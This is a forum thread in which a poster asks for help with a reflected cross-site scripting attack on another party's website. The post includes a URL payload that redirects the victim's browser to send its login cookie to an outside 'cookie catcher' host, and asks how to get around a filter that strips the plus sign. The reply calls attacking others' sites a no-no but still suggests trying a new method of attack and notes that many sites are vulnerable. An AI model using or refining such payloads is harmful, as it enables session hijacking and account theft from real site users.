
Cross Site Scripting: XSS


Stiofan


Hi All,

I have a problem with a site that seems vulnerable to XSS!

[tt]http://www.site.com/help/topic.php?&topic_name=<script>alert(document.cookie)</script>[/tt]

The above will display the details of the login cookie. However, I can't get the following to work:

[tt]http://www.site.com/help/topic.php?&topic_name=<script>document.location="http://www.mycookiecatcher.com?c="+document.cookie</script>[/tt]

Won't work!

I've tried converting it to HEX etc. Nothing seems to work. Am I doing something wrong, or are there security features in modern browsers that prevent this?

When I view the HTML source however, I notice something interesting:

[tt]<script>document.location="http://www.mycookiecatcher.com/c.php?c=" document.cookie</script>[/tt]

It would appear to have filtered out the plus (+) symbol? When I type the URL:

[tt] www.site.com/help/topic.php?&topic_name=<script>document.location="www.mycookiecatcher.com?c="+document.cookie</script> [/tt]

into my browser and hit go, I get a JavaScript error. It says it expected a semicolon.

I would imagine this relates to the plus symbol being filtered? I have tried to convert to HEX but I get the same problem. Is there anything else I can do?

Thanks,

S.


It's possible it filtered a number of things, but either way, you started this topic the wrong way: you said that you're attacking someone else's website, and this is a no-no.

So simply I will say that the site you are attacking isn't so vulnerable after all. Quite easily the web host may be filtering out "http://www.mycookiecatcher.com" in the address. This is easily done. I suggest a new method of attack.

I have a problem with a site that seems vulnerable to XSS!

There are hundreds upon thousands of sites vulnerable to an XSS attack; you just gotta know how to find 'em, and what styles of XSS attacks you can do.
